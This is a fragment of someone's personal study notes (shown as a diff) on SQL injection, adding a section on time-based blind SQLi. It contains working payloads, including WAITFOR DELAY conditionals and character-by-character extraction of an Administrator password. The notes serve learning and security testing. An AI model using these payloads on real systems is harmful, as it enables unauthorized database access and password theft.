KhaelK138/KhaelK138.github.io/webappnotes/SQLi.md

       - Alternate: `' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm`
         - Might not work if strings can't be compared, but can allow a binary search
       - Can be `SUBSTR` with some databases - refer to cheat sheet
+- Time delay SQLi
+  - Sometimes, the app will handle error messages gracefully, meaning no difference in application response
+  - Check for true/false boolean (depending on the database; cheat sheet has copy-paste):
+    - `'; IF (1=2) WAITFOR DELAY '0:0:10'--`
+    - `'; IF (1=1) WAITFOR DELAY '0:0:10'--`
+  - Based on the condition, retrieve data one character at a time (again depending on database):
+    - `'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--`

 **Error-based SQL Injection**
 - Similar to response-based SQLi, where we can infer the result of the query based on an application error